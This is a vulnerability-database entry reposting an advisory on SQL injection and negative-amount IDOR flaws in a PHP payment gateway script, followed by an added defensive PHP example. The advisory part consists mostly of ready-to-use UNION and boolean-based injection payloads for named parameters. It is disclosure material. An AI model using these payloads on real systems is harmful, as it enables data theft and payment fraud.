CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-29654 | CWE-89 | $500 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-01-19 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |

iTechScripts Payment Gateway Script 8.46 SQL Injection

Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/payment-gateway-script/ <http://itechscripts.com/image-sharing-script/>
Software Price and Demo : $400 http://payment-gateway.itechscripts.com <http://photo-sharing.itechscripts.com/>

------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/user-profile.php
Vulnerable Parameters: token
Method: GET
Payload: -3519' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

------------------------------------------------------

Type: IDOR
Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php
Vulnerable Parameters: t_amount and t_paid
Method: POST
Payload: negative money value (ps:-1350)

------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/netbank_historyDetails.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH

------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/netbank_histPrew.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH

------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/overview.php
Vulnerable Parameters: limit
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH

--
Best Regards,
Hasan Emre
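
A defensive counterpart to the findings above, as an added example (not code from the vendor or the advisory author): server-side handling for the `token`, `limit` and `t_amount`/`t_paid` parameters using bound parameters and strict validation. The table and column names, the hex token format, the function names and the in-memory SQLite database (via `pdo_sqlite`, standing in for the application's own database) are assumptions.

```php
<?php
// Added example, not vendor code. Schema, token format and helper names are hypothetical.
declare(strict_types=1);

// In-memory SQLite stands in for the application's database (assumption).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, token TEXT UNIQUE, balance_cents INTEGER)');
$pdo->exec("INSERT INTO users (token, balance_cents) VALUES ('a1b2c3d4e5f60718', 50000)");

// token (user-profile.php, netbank_*.php): check the format, then bind the value.
function findUserByToken(PDO $pdo, string $token): ?array
{
    if (!preg_match('/\A[a-f0-9]{16,64}\z/', $token)) {
        return null; // quotes, spaces and SQL syntax never reach the query
    }
    $stmt = $pdo->prepare('SELECT id, balance_cents FROM users WHERE token = :token');
    $stmt->execute([':token' => $token]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// limit (overview.php): accept only an integer in a fixed range, else a default.
function parseLimit(string $raw, int $max = 100): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => $max]]);
    return $n === false ? 20 : $n;
}

// t_amount (send-money-confirm.php): unsigned decimal, positive, within balance.
// t_paid should be recomputed on the server rather than read from the request.
function parseAmountCents(string $raw, int $balanceCents): ?int
{
    if (!preg_match('/\A\d{1,9}(\.\d{1,2})?\z/', $raw)) {
        return null; // no sign character is accepted, so negative values fail here
    }
    [$whole, $frac] = array_pad(explode('.', $raw, 2), 2, '');
    $cents = (int) $whole * 100 + (int) str_pad($frac, 2, '0'); // integer math, no floats
    return ($cents > 0 && $cents <= $balanceCents) ? $cents : null;
}

// Constructed inputs: one well-formed and one malformed value per parameter.
var_dump(findUserByToken($pdo, 'a1b2c3d4e5f60718'));
var_dump(findUserByToken($pdo, "a1b2' OR '1'='1"));
var_dump(parseLimit('10'), parseLimit("10' RLIKE"));
var_dump(parseAmountCents('13.50', 50000), parseAmountCents('-1350', 50000));
```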